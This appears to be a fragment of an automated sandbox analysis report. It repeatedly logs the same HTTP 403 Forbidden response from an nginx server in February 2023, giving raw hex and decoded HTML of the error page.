            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:48 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:48 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:49 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:50 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:50 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:51 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:51 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:53 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:53 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:55 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:57 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:58 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:58 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:00 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:05 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
